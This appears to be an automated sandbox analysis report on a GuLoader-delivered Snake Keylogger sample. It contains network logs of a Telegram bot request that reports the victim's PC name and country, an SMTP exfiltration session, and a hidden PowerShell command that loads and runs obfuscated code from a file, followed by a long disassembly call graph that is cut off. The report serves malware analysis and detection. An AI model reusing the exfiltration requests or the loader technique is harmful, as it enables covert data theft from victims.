                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.1049725188.114.97.34436624C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-22 14:04:30 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2024-10-22 14:04:30 UTC898INHTTP/1.1 200 OK
                                                                                          Date: Tue, 22 Oct 2024 14:04:30 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 31226
                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=beODQ5n7EpX7Rz5CaDvWtj2zTpVrF4eTJ8Av5JKQ%2BPBSCZhf%2FsvhYjrAU3N%2F8CaipRCf2WFxOugYe3N4KXU3gRaiO8EV97YhO%2FuQNxMwzH6h0effiIfI0%2B8JHu2hDhLc4cb0Kclr"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d6a09710c3ec872-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1081&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2427493&cwnd=252&unsent_bytes=0&cid=ba3e2a08c006e8eb&ts=146&x=0"
                                                                                          2024-10-22 14:04:30 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-22 14:04:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.1049727188.114.97.34436624C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-22 14:04:31 UTC63OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2024-10-22 14:04:31 UTC892INHTTP/1.1 200 OK
                                                                                          Date: Tue, 22 Oct 2024 14:04:31 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 31227
                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PokeJy02%2BLrsOLvNSmAetV0CeKheSp%2BRjgEaq9gDYsJuXnjmznquPg65fmznCWaiifTdmc9eUESi5e2RZCTBIFgxjve4G3QTjv0ienLTBCSxWWWfioT6nzS8shfpRXsL6sZ1SgK0"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d6a097a3c06e552-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1112&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2551541&cwnd=250&unsent_bytes=0&cid=a8f6698fd2b4ed9c&ts=150&x=0"
                                                                                          2024-10-22 14:04:31 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-22 14:04:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          11192.168.2.1049728149.154.167.2204436624C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-22 14:04:32 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2022/10/2024%20/%2022:38:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                          Host: api.telegram.org
                                                                                          Connection: Keep-Alive
                                                                                          2024-10-22 14:04:32 UTC344INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Tue, 22 Oct 2024 14:04:32 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 55
                                                                                          Connection: close
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                          2024-10-22 14:04:32 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                          Oct 22, 2024 16:04:39.782625914 CEST58749729213.165.67.118192.168.2.10220 kundenserver.de (mreue107) Nemesis ESMTP Service ready
                                                                                          Oct 22, 2024 16:04:39.787214994 CEST49729587192.168.2.10213.165.67.118EHLO 472847
                                                                                          Oct 22, 2024 16:04:40.036479950 CEST58749729213.165.67.118192.168.2.10250-kundenserver.de Hello 472847 [173.254.250.76]
                                                                                          250-8BITMIME
                                                                                          250-SIZE 141557760
                                                                                          250 STARTTLS
                                                                                          Oct 22, 2024 16:04:40.036618948 CEST49729587192.168.2.10213.165.67.118STARTTLS
                                                                                          Oct 22, 2024 16:04:40.291269064 CEST58749729213.165.67.118192.168.2.10220 OK

                                                                                          Click to jump to process

                                                                                          Click to jump to process

                                                                                          Click to dive into process behavior distribution

                                                                                          Click to jump to process

                                                                                          Target ID:0
                                                                                          Start time:10:03:11
                                                                                          Start date:22/10/2024
                                                                                          Path:C:\Users\user\Desktop\Rundholterne89.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\Rundholterne89.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:891'148 bytes
                                                                                          MD5 hash:A1E239C4D5116E289CE0597A92844EDE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:10:03:14
                                                                                          Start date:22/10/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"
                                                                                          Imagebase:0x6b0000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1886651504.000000000936D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:10:03:14
                                                                                          Start date:22/10/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff620390000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:6
                                                                                          Start time:10:04:02
                                                                                          Start date:22/10/2024
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                          Imagebase:0xcc0000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:25.1%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:23.4%
                                                                                            Total number of Nodes:1199
                                                                                            Total number of Limit Nodes:40
                                                                                            execution_graph 2613 403a41 2614 403b94 2613->2614 2615 403a59 2613->2615 2617 403be5 2614->2617 2618 403ba5 GetDlgItem GetDlgItem 2614->2618 2615->2614 2616 403a65 2615->2616 2619 403a70 SetWindowPos 2616->2619 2620 403a83 2616->2620 2622 403c3f 2617->2622 2630 401389 2 API calls 2617->2630 2621 403f14 19 API calls 2618->2621 2619->2620 2624 403aa0 2620->2624 2625 403a88 ShowWindow 2620->2625 2626 403bcf SetClassLongA 2621->2626 2631 403b8f 2622->2631 2683 403f60 2622->2683 2627 403ac2 2624->2627 2628 403aa8 DestroyWindow 2624->2628 2625->2624 2629 40140b 2 API calls 2626->2629 2633 403ac7 SetWindowLongA 2627->2633 2634 403ad8 2627->2634 2632 403e9d 2628->2632 2629->2617 2635 403c17 2630->2635 2632->2631 2642 403ece ShowWindow 2632->2642 2633->2631 2638 403b81 2634->2638 2639 403ae4 GetDlgItem 2634->2639 2635->2622 2640 403c1b SendMessageA 2635->2640 2636 40140b 2 API calls 2654 403c51 2636->2654 2637 403e9f DestroyWindow EndDialog 2637->2632 2720 403f7b 2638->2720 2643 403b14 2639->2643 2644 403af7 SendMessageA IsWindowEnabled 2639->2644 2640->2631 2642->2631 2646 403b21 2643->2646 2647 403b68 SendMessageA 2643->2647 2648 403b34 2643->2648 2657 403b19 2643->2657 2644->2631 2644->2643 2646->2647 2646->2657 2647->2638 2651 403b51 2648->2651 2652 403b3c 2648->2652 2650 403f14 19 API calls 2650->2654 2656 40140b 2 API calls 2651->2656 2714 40140b 2652->2714 2653 403b4f 2653->2638 2654->2631 2654->2636 2654->2637 2654->2650 2674 403ddf DestroyWindow 2654->2674 2686 405d51 2654->2686 2704 403f14 2654->2704 2658 403b58 2656->2658 2717 403eed 2657->2717 2658->2638 2658->2657 2660 403ccc GetDlgItem 2661 403ce1 2660->2661 2662 403ce9 ShowWindow KiUserCallbackDispatcher 2660->2662 2661->2662 2707 403f36 EnableWindow 2662->2707 2664 403d13 EnableWindow 2667 403d27 2664->2667 2665 403d2c GetSystemMenu EnableMenuItem SendMessageA 2666 403d5c SendMessageA 2665->2666 2665->2667 2666->2667 2667->2665 2708 403f49 SendMessageA 2667->2708 2709 405d2f lstrcpynA 2667->2709 2670 403d8a lstrlenA 2671 405d51 18 API calls 2670->2671 2672 403d9b SetWindowTextA 2671->2672 2710 401389 2672->2710 2674->2632 2675 403df9 CreateDialogParamA 2674->2675 2675->2632 2676 403e2c 2675->2676 2677 403f14 19 API calls 2676->2677 2678 403e37 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2677->2678 2679 401389 2 API calls 2678->2679 2680 403e7d 2679->2680 2680->2631 2681 403e85 ShowWindow 2680->2681 2682 403f60 SendMessageA 2681->2682 2682->2632 2684 403f78 2683->2684 2685 403f69 SendMessageA 2683->2685 2684->2654 2685->2684 2701 405d5e 2686->2701 2687 405f96 2687->2654 2688 405f81 2688->2687 2750 405d2f lstrcpynA 2688->2750 2690 405dff GetVersion 2690->2701 2691 405f58 lstrlenA 2691->2701 2693 405d51 10 API calls 2693->2691 2696 405e77 GetSystemDirectoryA 2696->2701 2697 405e8a GetWindowsDirectoryA 2697->2701 2699 405d51 10 API calls 2699->2701 2700 405f01 lstrcatA 2700->2701 2701->2688 2701->2690 2701->2691 2701->2693 2701->2696 2701->2697 2701->2699 2701->2700 2702 405ebe SHGetSpecialFolderLocation 2701->2702 2734 405c16 RegOpenKeyExA 2701->2734 2739 405f9a 2701->2739 2748 405c8d wsprintfA 2701->2748 2749 405d2f lstrcpynA 2701->2749 2702->2701 2703 405ed6 SHGetPathFromIDListA CoTaskMemFree 2702->2703 2703->2701 2705 405d51 18 API calls 2704->2705 2706 403f1f SetDlgItemTextA 2705->2706 2706->2660 2707->2664 2708->2667 2709->2670 2712 401390 2710->2712 2711 4013fe 2711->2654 2712->2711 2713 4013cb MulDiv SendMessageA 2712->2713 2713->2712 2715 401389 2 API calls 2714->2715 2716 401420 2715->2716 2716->2657 2718 403ef4 2717->2718 2719 403efa SendMessageA 2717->2719 2718->2719 2719->2653 2721 40401c 2720->2721 2722 403f93 GetWindowLongA 2720->2722 2721->2631 2722->2721 2723 403fa4 2722->2723 2724 403fb3 GetSysColor 2723->2724 2725 403fb6 2723->2725 2724->2725 2726 403fc6 SetBkMode 2725->2726 2727 403fbc SetTextColor 2725->2727 2728 403fe4 2726->2728 2729 403fde GetSysColor 2726->2729 2727->2726 2730 403ff5 2728->2730 2731 403feb SetBkColor 2728->2731 2729->2728 2730->2721 2732 404008 DeleteObject 2730->2732 2733 40400f CreateBrushIndirect 2730->2733 2731->2730 2732->2733 2733->2721 2735 405c87 2734->2735 2736 405c49 RegQueryValueExA 2734->2736 2735->2701 2737 405c6a RegCloseKey 2736->2737 2737->2735 2745 405fa6 2739->2745 2740 40600e 2741 406012 CharPrevA 2740->2741 2744 40602d 2740->2744 2741->2740 2742 406003 CharNextA 2742->2740 2742->2745 2744->2701 2745->2740 2745->2742 2746 405ff1 CharNextA 2745->2746 2747 405ffe CharNextA 2745->2747 2751 4057cc 2745->2751 2746->2745 2747->2742 2748->2701 2749->2701 2750->2687 2752 4057d2 2751->2752 2753 4057e5 2752->2753 2754 4057d8 CharNextA 2752->2754 2753->2745 2754->2752 3492 401cc2 3493 402a1d 18 API calls 3492->3493 3494 401cd2 SetWindowLongA 3493->3494 3495 4028cf 3494->3495 3496 401a43 3497 402a1d 18 API calls 3496->3497 3498 401a49 3497->3498 3499 402a1d 18 API calls 3498->3499 3500 4019f3 3499->3500 2767 401e44 2768 402a3a 18 API calls 2767->2768 2769 401e4a 2768->2769 2783 404f48 2769->2783 2773 401eb0 CloseHandle 2775 4026a6 2773->2775 2774 401e5a 2774->2773 2774->2775 2776 401e79 WaitForSingleObject 2774->2776 2797 406104 2774->2797 2776->2774 2777 401e87 GetExitCodeProcess 2776->2777 2778 401ea4 2777->2778 2779 401e99 2777->2779 2778->2773 2782 401ea2 2778->2782 2801 405c8d wsprintfA 2779->2801 2782->2773 2784 404f63 2783->2784 2793 401e54 2783->2793 2785 404f80 lstrlenA 2784->2785 2786 405d51 18 API calls 2784->2786 2787 404fa9 2785->2787 2788 404f8e lstrlenA 2785->2788 2786->2785 2790 404fbc 2787->2790 2791 404faf SetWindowTextA 2787->2791 2789 404fa0 lstrcatA 2788->2789 2788->2793 2789->2787 2792 404fc2 SendMessageA SendMessageA SendMessageA 2790->2792 2790->2793 2791->2790 2792->2793 2794 4054c0 CreateProcessA 2793->2794 2795 4054f3 CloseHandle 2794->2795 2796 4054ff 2794->2796 2795->2796 2796->2774 2798 406121 PeekMessageA 2797->2798 2799 406131 2798->2799 2800 406117 DispatchMessageA 2798->2800 2799->2776 2800->2798 2801->2782 3501 402644 3502 40264a 3501->3502 3503 402652 FindClose 3502->3503 3504 4028cf 3502->3504 3503->3504 2850 4048c5 GetDlgItem GetDlgItem 2851 404917 7 API calls 2850->2851 2854 404b2f 2850->2854 2852 4049ba DeleteObject 2851->2852 2853 4049ad SendMessageA 2851->2853 2855 4049c3 2852->2855 2853->2852 2859 404bf4 2854->2859 2865 404b8f 2854->2865 2875 404c13 2854->2875 2856 4049fa 2855->2856 2858 405d51 18 API calls 2855->2858 2860 403f14 19 API calls 2856->2860 2857 404cbf 2862 404cd1 2857->2862 2863 404cc9 SendMessageA 2857->2863 2864 4049dc SendMessageA SendMessageA 2858->2864 2869 404c05 SendMessageA 2859->2869 2859->2875 2866 404a0e 2860->2866 2861 404ea7 2868 403f7b 8 API calls 2861->2868 2876 404ce3 ImageList_Destroy 2862->2876 2877 404cea 2862->2877 2881 404cfa 2862->2881 2863->2862 2864->2855 2906 404813 SendMessageA 2865->2906 2871 403f14 19 API calls 2866->2871 2867 404c6c SendMessageA 2867->2861 2873 404c81 SendMessageA 2867->2873 2874 404eb5 2868->2874 2869->2875 2885 404a1c 2871->2885 2872 404e69 2872->2861 2882 404e7b ShowWindow GetDlgItem ShowWindow 2872->2882 2879 404c94 2873->2879 2875->2857 2875->2861 2875->2867 2876->2877 2880 404cf3 GlobalFree 2877->2880 2877->2881 2878 404af0 GetWindowLongA SetWindowLongA 2883 404b09 2878->2883 2890 404ca5 SendMessageA 2879->2890 2880->2881 2881->2872 2900 404d35 2881->2900 2911 404893 2881->2911 2882->2861 2886 404b27 2883->2886 2887 404b0f ShowWindow 2883->2887 2884 404ba0 2884->2859 2885->2878 2889 404a6b SendMessageA 2885->2889 2891 404aea 2885->2891 2893 404aa7 SendMessageA 2885->2893 2894 404ab8 SendMessageA 2885->2894 2905 403f49 SendMessageA 2886->2905 2904 403f49 SendMessageA 2887->2904 2889->2885 2890->2857 2891->2878 2891->2883 2893->2885 2894->2885 2896 404b22 2896->2861 2897 404e3f InvalidateRect 2897->2872 2898 404e55 2897->2898 2920 4047ce 2898->2920 2899 404d63 SendMessageA 2903 404d79 2899->2903 2900->2899 2900->2903 2902 404ded SendMessageA SendMessageA 2902->2903 2903->2897 2903->2902 2904->2896 2905->2854 2907 404872 SendMessageA 2906->2907 2908 404836 GetMessagePos ScreenToClient SendMessageA 2906->2908 2909 40486a 2907->2909 2908->2909 2910 40486f 2908->2910 2909->2884 2910->2907 2923 405d2f lstrcpynA 2911->2923 2913 4048a6 2924 405c8d wsprintfA 2913->2924 2915 4048b0 2916 40140b 2 API calls 2915->2916 2917 4048b9 2916->2917 2925 405d2f lstrcpynA 2917->2925 2919 4048c0 2919->2900 2926 404709 2920->2926 2922 4047e3 2922->2872 2923->2913 2924->2915 2925->2919 2927 40471f 2926->2927 2928 405d51 18 API calls 2927->2928 2929 404783 2928->2929 2930 405d51 18 API calls 2929->2930 2931 40478e 2930->2931 2932 405d51 18 API calls 2931->2932 2933 4047a4 lstrlenA wsprintfA SetDlgItemTextA 2932->2933 2933->2922 3505 4022c7 3506 402a3a 18 API calls 3505->3506 3507 4022d8 3506->3507 3508 402a3a 18 API calls 3507->3508 3509 4022e1 3508->3509 3510 402a3a 18 API calls 3509->3510 3511 4022eb GetPrivateProfileStringA 3510->3511 3512 4028c8 InvalidateRect 3513 4028cf 3512->3513 2970 401bca 2971 402a1d 18 API calls 2970->2971 2972 401bd1 2971->2972 2973 402a1d 18 API calls 2972->2973 2974 401bdb 2973->2974 2975 401beb 2974->2975 2976 402a3a 18 API calls 2974->2976 2977 401bfb 2975->2977 2978 402a3a 18 API calls 2975->2978 2976->2975 2979 401c06 2977->2979 2980 401c4a 2977->2980 2978->2977 2982 402a1d 18 API calls 2979->2982 2981 402a3a 18 API calls 2980->2981 2983 401c4f 2981->2983 2984 401c0b 2982->2984 2985 402a3a 18 API calls 2983->2985 2986 402a1d 18 API calls 2984->2986 2987 401c58 FindWindowExA 2985->2987 2988 401c14 2986->2988 2991 401c76 2987->2991 2989 401c3a SendMessageA 2988->2989 2990 401c1c SendMessageTimeoutA 2988->2990 2989->2991 2990->2991 3407 401751 3408 402a3a 18 API calls 3407->3408 3409 401758 3408->3409 3410 401776 3409->3410 3411 40177e 3409->3411 3446 405d2f lstrcpynA 3410->3446 3447 405d2f lstrcpynA 3411->3447 3414 40177c 3418 405f9a 5 API calls 3414->3418 3415 401789 3416 4057a1 3 API calls 3415->3416 3417 40178f lstrcatA 3416->3417 3417->3414 3438 40179b 3418->3438 3419 406033 2 API calls 3419->3438 3420 40597d 2 API calls 3420->3438 3422 4017b2 CompareFileTime 3422->3438 3423 401876 3424 404f48 25 API calls 3423->3424 3426 401880 3424->3426 3425 40184d 3427 404f48 25 API calls 3425->3427 3435 401862 3425->3435 3429 402e9f 32 API calls 3426->3429 3427->3435 3428 405d2f lstrcpynA 3428->3438 3430 401893 3429->3430 3431 4018a7 SetFileTime 3430->3431 3433 4018b9 CloseHandle 3430->3433 3431->3433 3432 405d51 18 API calls 3432->3438 3434 4018ca 3433->3434 3433->3435 3436 4018e2 3434->3436 3437 4018cf 3434->3437 3440 405d51 18 API calls 3436->3440 3439 405d51 18 API calls 3437->3439 3438->3419 3438->3420 3438->3422 3438->3423 3438->3425 3438->3428 3438->3432 3441 405525 MessageBoxIndirectA 3438->3441 3445 4059a2 GetFileAttributesA CreateFileA 3438->3445 3442 4018d7 lstrcatA 3439->3442 3443 4018ea 3440->3443 3441->3438 3442->3443 3444 405525 MessageBoxIndirectA 3443->3444 3444->3435 3445->3438 3446->3414 3447->3415 3517 401651 3518 402a3a 18 API calls 3517->3518 3519 401657 3518->3519 3520 406033 2 API calls 3519->3520 3521 40165d 3520->3521 3522 401951 3523 402a1d 18 API calls 3522->3523 3524 401958 3523->3524 3525 402a1d 18 API calls 3524->3525 3526 401962 3525->3526 3527 402a3a 18 API calls 3526->3527 3528 40196b 3527->3528 3529 40197e lstrlenA 3528->3529 3530 4019b9 3528->3530 3531 401988 3529->3531 3531->3530 3535 405d2f lstrcpynA 3531->3535 3533 4019a2 3533->3530 3534 4019af lstrlenA 3533->3534 3534->3530 3535->3533 3536 404352 3537 40437e 3536->3537 3538 40438f 3536->3538 3597 405509 GetDlgItemTextA 3537->3597 3539 40439b GetDlgItem 3538->3539 3543 4043fa 3538->3543 3542 4043af 3539->3542 3541 404389 3545 405f9a 5 API calls 3541->3545 3546 4043c3 SetWindowTextA 3542->3546 3549 40583a 4 API calls 3542->3549 3544 4044de 3543->3544 3551 405d51 18 API calls 3543->3551 3595 404688 3543->3595 3544->3595 3599 405509 GetDlgItemTextA 3544->3599 3545->3538 3550 403f14 19 API calls 3546->3550 3548 403f7b 8 API calls 3553 40469c 3548->3553 3554 4043b9 3549->3554 3555 4043df 3550->3555 3556 40446e SHBrowseForFolderA 3551->3556 3552 40450e 3557 40588f 18 API calls 3552->3557 3554->3546 3561 4057a1 3 API calls 3554->3561 3558 403f14 19 API calls 3555->3558 3556->3544 3559 404486 CoTaskMemFree 3556->3559 3560 404514 3557->3560 3562 4043ed 3558->3562 3563 4057a1 3 API calls 3559->3563 3600 405d2f lstrcpynA 3560->3600 3561->3546 3598 403f49 SendMessageA 3562->3598 3567 404493 3563->3567 3566 4043f3 3570 4060c8 5 API calls 3566->3570 3568 4044ca SetDlgItemTextA 3567->3568 3572 405d51 18 API calls 3567->3572 3568->3544 3569 40452b 3571 4060c8 5 API calls 3569->3571 3570->3543 3579 404532 3571->3579 3573 4044b2 lstrcmpiA 3572->3573 3573->3568 3575 4044c3 lstrcatA 3573->3575 3574 40456e 3601 405d2f lstrcpynA 3574->3601 3575->3568 3577 404575 3578 40583a 4 API calls 3577->3578 3580 40457b GetDiskFreeSpaceA 3578->3580 3579->3574 3583 4057e8 2 API calls 3579->3583 3585 4045c6 3579->3585 3582 40459f MulDiv 3580->3582 3580->3585 3582->3585 3583->3579 3584 404637 3587 40465a 3584->3587 3589 40140b 2 API calls 3584->3589 3585->3584 3586 4047ce 21 API calls 3585->3586 3588 404624 3586->3588 3602 403f36 EnableWindow 3587->3602 3590 404639 SetDlgItemTextA 3588->3590 3591 404629 3588->3591 3589->3587 3590->3584 3593 404709 21 API calls 3591->3593 3593->3584 3594 404676 3594->3595 3603 4042e7 3594->3603 3595->3548 3597->3541 3598->3566 3599->3552 3600->3569 3601->3577 3602->3594 3604 4042f5 3603->3604 3605 4042fa SendMessageA 3603->3605 3604->3605 3605->3595 3606 4019d2 3607 402a3a 18 API calls 3606->3607 3608 4019d9 3607->3608 3609 402a3a 18 API calls 3608->3609 3610 4019e2 3609->3610 3611 4019e9 lstrcmpiA 3610->3611 3612 4019fb lstrcmpA 3610->3612 3613 4019ef 3611->3613 3612->3613 3614 4021d2 3615 402a3a 18 API calls 3614->3615 3616 4021d8 3615->3616 3617 402a3a 18 API calls 3616->3617 3618 4021e1 3617->3618 3619 402a3a 18 API calls 3618->3619 3620 4021ea 3619->3620 3621 406033 2 API calls 3620->3621 3622 4021f3 3621->3622 3623 402204 lstrlenA lstrlenA 3622->3623 3627 4021f7 3622->3627 3625 404f48 25 API calls 3623->3625 3624 404f48 25 API calls 3628 4021ff 3624->3628 3626 402240 SHFileOperationA 3625->3626 3626->3627 3626->3628 3627->3624 3627->3628 3629 4014d6 3630 402a1d 18 API calls 3629->3630 3631 4014dc Sleep 3630->3631 3633 4028cf 3631->3633 3634 40155b 3635 401577 ShowWindow 3634->3635 3636 40157e 3634->3636 3635->3636 3637 40158c ShowWindow 3636->3637 3638 4028cf 3636->3638 3637->3638 3639 40255c 3640 402a1d 18 API calls 3639->3640 3645 402566 3640->3645 3641 4025d0 3642 405a1a ReadFile 3642->3645 3643 4025d2 3648 405c8d wsprintfA 3643->3648 3644 4025e2 3644->3641 3647 4025f8 SetFilePointer 3644->3647 3645->3641 3645->3642 3645->3643 3645->3644 3647->3641 3648->3641 3649 40405d 3650 404073 3649->3650 3655 40417f 3649->3655 3653 403f14 19 API calls 3650->3653 3651 4041ee 3652 4042c2 3651->3652 3654 4041f8 GetDlgItem 3651->3654 3660 403f7b 8 API calls 3652->3660 3656 4040c9 3653->3656 3657 40420e 3654->3657 3658 404280 3654->3658 3655->3651 3655->3652 3659 4041c3 GetDlgItem SendMessageA 3655->3659 3661 403f14 19 API calls 3656->3661 3657->3658 3666 404234 6 API calls 3657->3666 3658->3652 3662 404292 3658->3662 3680 403f36 EnableWindow 3659->3680 3664 4042bd 3660->3664 3665 4040d6 CheckDlgButton 3661->3665 3667 404298 SendMessageA 3662->3667 3668 